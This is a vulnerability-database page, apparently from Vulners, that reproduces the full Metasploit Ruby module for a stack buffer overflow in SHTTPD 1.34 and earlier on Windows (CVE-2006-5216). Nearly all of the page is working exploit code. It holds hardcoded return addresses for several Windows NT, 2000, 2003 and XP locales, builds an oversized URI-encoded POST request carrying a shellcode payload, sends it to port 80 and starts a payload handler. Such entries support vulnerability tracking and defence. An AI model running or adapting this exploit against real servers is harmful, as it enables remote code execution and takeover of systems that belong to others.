SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)

🗓️ 01 Jul 2014 00:00:00Reported by RootType

SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32). Exploits a stack buffer overflow in SHTTPD <= 1.34 caused by a boundary error within the handling of POST requests


                                                ##
# $Id: shttpd_post.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;SHTTPD &#60;= 1.34 URI-Encoded POST Request Overflow (win32)&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a stack buffer overflow in SHTTPD &#60;= 1.34.
				The vulnerability is caused due to a boundary error within the
				handling of POST requests. Based on an original exploit by skOd
				but using a different method found by hdm.
			},
			&#39;Author&#39;         =&#62; [ &#39;LMH &#60;lmh [at] info-pull.com&#62;&#39;, &#39;hdm&#39;, &#39;skOd&#39;],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 9262 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2006-5216&#39;],
					[ &#39;OSVDB&#39;, &#39;29565&#39; ],
					[ &#39;URL&#39;, &#39;http://shttpd.sourceforge.net&#39;],
					[ &#39;BID&#39;, &#39;20393&#39;],
				],
			&#39;Privileged&#39;     =&#62; false,
			&#39;Payload&#39;        =&#62;
				{
					&#39;BadChars&#39; =&#62; &#34;\x00&#34;,
				},
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;Targets&#39;        =&#62;
				[
					# Except for Spanish locale target, all come from:
					# http://metasploit.com/users/opcode/msfopcode.cgi
					[ &#39;Windows NT English SP5-SP6&#39;,			{ &#39;Ret&#39; =&#62; 0x776a183a } ],
					[ &#39;Windows 2000 Spanish SP4&#39;,			{ &#39;Ret&#39; =&#62; 0x79496391 } ],
					[ &#39;Windows 2000 French SP4&#39;,			{ &#39;Ret&#39; =&#62; 0x74fb108d } ],
					[ &#39;Windows 2000 English SP0-SP4&#39;,			{ &#39;Ret&#39; =&#62; 0x75021421 } ],
					[ &#39;Windows 2000 French SP0-SP4&#39;,			{ &#39;Ret&#39; =&#62; 0x74fa3144 } ],
					[ &#39;Windows 2003 Server English SP0-SP1&#39;,	{ &#39;Ret&#39; =&#62; 0x77d877d3 } ],
					[ &#39;Windows XP German SP2&#39;,				{ &#39;Ret&#39; =&#62; 0x71a02975 } ],
					[ &#39;Windows XP German SP1&#39;,				{ &#39;Ret&#39; =&#62; 0x71a02a6a } ],
					[ &#39;Windows XP English SP2&#39;,				{ &#39;Ret&#39; =&#62; 0x71aa1e08 } ],
					[ &#39;Windows XP English SP0-SP1&#39;,			{ &#39;Ret&#39; =&#62; 0x71aa1aaa } ],
				],
			&#39;DisclosureDate&#39; =&#62; &#39;Oct 6 2006&#39;))

		register_options(
			[
				Opt::RPORT(80)
			], self.class )
	end

	def exploit
		connect

		pat = rand_text_alphanumeric(4000)
		pat[8,4] = [target.ret].pack(&#39;V&#39;)
		pat[103, payload.encoded.length] = payload.encoded
		pat = Rex::Text.uri_encode(pat)

		res = &#34;post /#{pat} HTTP/1.0\r\n\r\n&#34;

		print_status(&#34;Trying target address 0x%.8x...&#34; % target.ret)
		sock.put(res)
		sock.close

		handler
		disconnect
	end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1